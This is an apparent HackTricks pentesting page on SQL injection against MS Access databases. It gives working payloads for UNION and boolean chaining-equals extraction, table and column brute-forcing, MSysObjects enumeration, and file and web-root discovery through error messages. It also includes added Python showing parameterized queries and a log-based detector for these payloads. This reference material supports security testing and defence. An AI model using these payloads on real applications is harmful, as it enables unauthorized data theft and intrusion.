MS Access SQL Injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Online Playground
DB Limitations
String Concatenation
String concatenation is possible with the & (%26) and + (%2b) characters.
1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00
Comments
There are no comments in MS Access, but apparently it's possible to cut off the rest of the query with a NULL character:
1' union select 1,2 from table%00
If this is not working you could always fix the syntax of the query:
1' UNION SELECT 1,2 FROM table WHERE ''='
Stacked Queries
They aren't supported.
LIMIT
The LIMIT operator isn't implemented. However, it's possible to limit SELECT query results to the first N table rows using the TOP operator. TOP accepts an integer argument representing the number of rows to be returned.
1' UNION SELECT TOP 3 attr FROM table%00
Just like TOP you can use LAST, which will get the rows from the end.
UNION Queries/Sub queries
In a SQLi you will usually want to execute a new query to extract information from other tables. MS Access always requires that subqueries or extra queries indicate a FROM. So, if you want to execute a UNION SELECT, a UNION ALL SELECT, or a SELECT between parentheses in a condition, you always need to indicate a FROM with a valid table name. Therefore, you need to know a valid table name.
-1' UNION SELECT username,password from users%00
Chaining equals + Substring
{% hint style="warning" %}
MS Access allows weird syntax such as '1'=2='3'='asd'=false. As the SQL injection will usually be inside a WHERE clause, we can abuse that.
{% endhint %}
Imagine you have a SQLi in a MS Access database and you know (or have guessed) that one column name is username, and that this is the field you want to exfiltrate. You could check the different responses of the web app when the chaining equals technique is used and potentially exfiltrate content with a boolean injection, using the Mid function to get substrings.
'=(Mid(username,1,3)='adm')='
If you know the name of the table and column to dump, you can combine Mid, LAST and TOP to leak all the info via boolean SQLi:
'=(Mid((select last(username) from (select top 1 username from usernames)),1,3)='Alf')='
A UNION-based variant walks the column one character at a time:
SELECT TOP 1 Mid(column, 1, 1) FROM table WHERE column > 'a'
UNION ALL SELECT TOP 1 Mid(column, 2, 1) FROM table WHERE column > 'a'
UNION ALL SELECT TOP 1 Mid(column, 3, 1) FROM table WHERE column > 'a'
... ORDER BY column
This query extracts the first character of the specified column, then the second, and so on, until all the characters are leaked. TOP 1 ensures that only one character is returned at a time, and Mid extracts the specific substring from the column value. The WHERE condition column > 'a' is used to select only characters with an ASCII value greater than 'a', avoiding potential errors. UNION ALL combines the results of the individual queries into a single result set, and ORDER BY orders the results by the column being extracted.
Feel free to check this in the online playground.
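To make the chaining-equals trick concrete, here is an added Python example (not from the original page) that renders the WHERE clause a concatenating ASP-style login query would hand to the Jet engine, beside the parameterized form that keeps the same input inert. The users table and the query template are constructed; sqlite3 stands in for the ODBC connection, so only the parameterized path is executed here (sqlite does not implement Access's chained comparison).

```python
import sqlite3

# Hypothetical application query, built the vulnerable way: the user-controlled
# value is pasted into the SQL text (modelled on the page's MS Access examples).
VULNERABLE_TEMPLATE = "SELECT id FROM users WHERE username = '{value}'"

# Payload from the page: it closes the quote on both sides and leaves behind a
# comparison chain that the Jet engine evaluates as a boolean oracle.
CHAINED_EQUALS_PAYLOAD = "'=(Mid(username,1,3)='adm')='"


def build_vulnerable_sql(value: str) -> str:
    """Text the database receives when the value is concatenated in."""
    return VULNERABLE_TEMPLATE.format(value=value)


def lookup_parameterized(conn: sqlite3.Connection, value: str) -> list:
    """Same lookup with a bound parameter ('?' is also the ODBC/ADO placeholder
    style used with Access): the value is data, never SQL, so a payload simply
    fails to match any username."""
    return conn.execute(
        "SELECT id FROM users WHERE username = ?", (value,)
    ).fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the Access database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "alice")])
    return conn


if __name__ == "__main__":
    print(build_vulnerable_sql(CHAINED_EQUALS_PAYLOAD))
    # -> SELECT id FROM users WHERE username = ''=(Mid(username,1,3)='adm')=''
    db = demo_db()
    print(lookup_parameterized(db, "admin"))                 # [(1,)]
    print(lookup_parameterized(db, CHAINED_EQUALS_PAYLOAD))  # []
```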
Brute-forcing Table names
Using the chaining equals technique you can also bruteforce table names with something like:
'=(select+top+1+'lala'+from+<table_name>)='
You can also use a more traditional way:
-1' AND (SELECT TOP 1 <table_name>)%00
Wordlists you can use:
- Sqlmap common table names: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
- There is another list in http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
Brute-Forcing Column names
You can brute-force the current column names with the chaining equals trick with:
'=column_name='
Or with a group by. The general form of a GROUP BY query is:
SELECT column1, column2, ..., aggregate_function(column)
FROM table
WHERE condition
GROUP BY column1, column2, ...
and the injected payload becomes:
-1' GROUP BY column_name%00
Or you can brute-force column names of a different table with:
'=(SELECT TOP 1 column_name FROM valid_table_name)='
-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00
Dumping data
We have already discussed the chaining equals technique to dump data from the current and other tables. But there are other ways:
IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
Time Based
Other Interesting functions
- Mid('admin',1,1) get substring from position 1 with length 1 (initial position is 1)
- LEN('1234') get length of string
- ASC('A') get ascii value of char
- CHR(65) get string from ascii value
- IIF(1=1,'a','b') if then
- COUNT(*) count number of items
Enumerating tables
From here you can see a query to get tables names:
select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name
FileSystem access
Web Root Directory Full Path
Knowledge of the web root absolute path may facilitate further attacks. If application errors are not completely concealed, the directory path can be uncovered by trying to select data from a nonexistent database.
http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00
MS Access responds with an error message containing the web directory full pathname.
File Enumeration
The following attack vector can be used to infer the existence of a file on the remote filesystem. If the specified file exists, MS Access triggers an error message informing that the database format is invalid:
http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00
Another way to enumerate files consists in specifying a database.table item. If the specified file exists, MS Access displays a database format error message.
http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00
.mdb File Name Guessing
Database file name (.mdb) can be inferred with the following query:
http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00
Where name[i] is a .mdb filename and realTable is an existing table within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
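As an added example (not from the original page), here is a small Python detector that URL-decodes the request target of web server log lines and flags the MS Access specific payload shapes this page describes: the %00 terminator, UNION SELECT with TOP/LAST, the chaining-equals '=...=' form, Mid()/IIF() oracles, MSysObjects reads and FROM db.table / IN 'file' references. The log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic): one benign request followed by
# requests carrying the payload shapes discussed on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /script.asp?id=42 HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /script.asp?id=1'+UNION+SELECT+'web'+%2b+'app'+FROM+table%00 HTTP/1.1" 500 212
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /script.asp?id='=(Mid(username,1,3)='adm')=' HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\\boot.ini'%00 HTTP/1.1" 500 198
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /script.asp?id=1'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00 HTTP/1.1" 500 301
"""

# Request target of a Common Log Format line.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Each rule is (name, pattern); patterns run on the decoded query string.
RULES = [
    # %00 survives decoding as a literal NUL, the query terminator the page uses.
    ("null-byte terminator", re.compile(r"\x00")),
    ("union select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    # '=<expr>=' : the value closes the quote on both sides of the injected comparison.
    ("chained equals", re.compile(r"'=.+='")),
    ("Mid() substring", re.compile(r"\bmid\s*\(", re.I)),
    ("TOP/LAST row limiting", re.compile(r"\b(?:top\s+\d+|last\s*\()", re.I)),
    ("MSysObjects catalog", re.compile(r"msysobjects", re.I)),
    # FROM db.table (web-root / .mdb guessing) or ... IN 'file' (file enumeration).
    ("external db/file reference",
     re.compile(r"\bin\s+'[^']*'|\bfrom\s+[\w.:\\]+\.\w+", re.I)),
    ("IIF() oracle", re.compile(r"\biif\s*\(", re.I)),
]


def decode_query(request_target: str) -> str:
    """Return the decoded query string of a request target ('' if it has none).

    unquote_plus maps '+' to a space and %XX to the byte it encodes, so %00
    becomes NUL and %2b / %26 become the '+' and '&' concatenation operators.
    The whole query string is decoded as one unit on purpose: splitting on '&'
    first would break payloads that carry an encoded '&'.
    """
    _, _, query = request_target.partition("?")
    return unquote_plus(query)


def scan_line(line: str) -> list[str]:
    """Names of the rules that match one log line (empty list = nothing found)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    decoded = decode_query(m.group(1))
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based line number -> matched rule names, for lines with at least one hit."""
    hits = {}
    for number, line in enumerate(text.splitlines(), start=1):
        found = scan_line(line)
        if found:
            hits[number] = found
    return hits


if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(names)}")
```

Decoding before matching matters: the same payload sent as %2b, as a literal +, or with the keywords split by + (form-encoded spaces) all land on the same rule.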
.mdb Password Cracker
Access PassView is a free utility that can be used to recover the main database password of Microsoft Access 95/97/2000/XP or Jet Database Engine 3.0/4.0.
References